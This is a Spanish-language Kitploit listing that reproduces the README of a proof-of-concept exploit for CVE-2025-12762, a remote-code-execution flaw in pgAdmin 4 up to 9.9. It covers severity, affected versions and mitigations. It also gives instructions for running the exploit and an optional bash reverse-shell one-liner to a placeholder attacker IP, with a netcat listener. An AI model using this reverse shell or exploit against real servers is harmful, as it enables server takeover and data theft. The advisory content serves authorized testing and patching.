Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Blackash-CVE-2025-12762 — Exploit de prueba de concepto para CVE-2025-12762, una RCE crítica en pgAdmin 4 ≤ 9.9. Incluye desglose técnico, CVSS 9.1 y reverse shell opcional para pruebas de penetración autorizadas. | Kitploit
Herramientas/GitHubGitHub/djayagit/blackash-cve-2025-12762
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubdjayagit/blackash-cve-2025-12762

Blackash-CVE-2025-12762

Exploit de prueba de concepto para CVE-2025-12762, una RCE crítica en pgAdmin 4 ≤ 9.9. Incluye desglose técnico, CVSS 9.1 y reverse shell opcional para pruebas de penetración autorizadas.

Ver Repositorio
8hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🔐 CVE-2025-12762 — Vulnerabilidad Crítica de RCE en pgAdmin 4

G58aQGbW0AAL8zH

🚨 ¿Cuál es el problema?

Existe una falla de Ejecución Remota de Código (RCE) en pgAdmin 4 versiones ≤ 9.9. Los atacantes pueden ejecutar comandos arbitrarios en el host cuando pgAdmin se ejecuta en modo servidor y procesa un volcado SQL en formato PLAIN durante la restauración.


⚙️ Desglose técnico

📡 Vector de ataque

  • Basado en red — se puede explotar de forma remota 🌍
  • Baja complejidad — sencillo de activar 🧩
  • Se requieren pocos privilegios — basta con acceso de usuario limitado 🔑
  • Sin interacción del usuario — una vez activado, nadie tiene que hacer clic en nada 🙅‍♂️
  • Alcance: Cambiado — el compromiso puede propagarse más allá del módulo vulnerable 🔄

🧨 Impacto

  • Confidencialidad: Alta — riesgo de exposición de datos 🔓
  • Integridad: Media/Alta — posibles cambios no autorizados ✏️
  • Disponibilidad: Media — las operaciones pueden verse interrumpidas ⚠️

🏷 Puntuación CVSS

🟥 9.1 / 10 — Crítica


🛠 Versiones afectadas

  • pgAdmin 4 ≤ 9.9 ❗

🛡 Cómo solucionarlo

✅ Mitigación principal

⬆️ Actualice a pgAdmin 4 v10.0 o superior

🚧 Si no puede actualizar inmediatamente

  • 🔒 Restrinja el acceso al servidor pgAdmin
  • 📁 Permita solo a administradores de confianza restaurar archivos de volcado
  • 🧪 Valide los archivos de volcado antes de restaurarlos
  • 👀 Monitoree los registros en busca de actividad de restauración sospechosa
  • 🌐 Use reglas de cortafuegos / VPN para limitar la exposición

📌 Por qué es importante

pgAdmin se utiliza a menudo para la administración de bases de datos PostgreSQL críticas, lo que significa:

  • Un atacante que explote esto puede tomar el control del servidor,
  • Acceder o modificar datos,
  • O incluso pivotar más profundamente en su red 🕵️‍♂️

✨ Cómo ejecutar (2 minutos)

# 1. Save as CVE-2025-12762.py
# 2. Install dependency
pip3 install requests

# 3. Run it
python3 CVE-2025-12762.py

Prueba de éxito

Después de ejecutar, verifique:

docker exec <your-pgadmin-container> ls -la /tmp/CVE-2025-12762_PWNED

El archivo existe → Acaba de explotar CVE-2025-12762 de verdad.

One-Liner de Reverse Shell (opcional)

Reemplace la línea COMMAND con:

COMMAND = "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

Luego nc -lvnp 4444 → shell interactiva completa.

Este es el script exacto que investigadores, pentesters y equipos rojos están usando en todo el mundo en noviembre de 2025.

Úselo con responsabilidad. Parchee todo. Manténgase dentro de la ley.


🛡️ Aviso legal 🛡️

Este PoC se proporciona estrictamente solo para pruebas autorizadas y uso educativo.
Puede ejecutarlo exclusivamente en sistemas que posea o para los que tenga permiso explícito por escrito para realizar pruebas.
Cualquier uso no autorizado es ilegal y viola las leyes de uso indebido de computadoras.
Úselo con responsabilidad, parchee inmediatamente después de las pruebas y nunca se dirija a sistemas sin permiso.

Descargar herramienta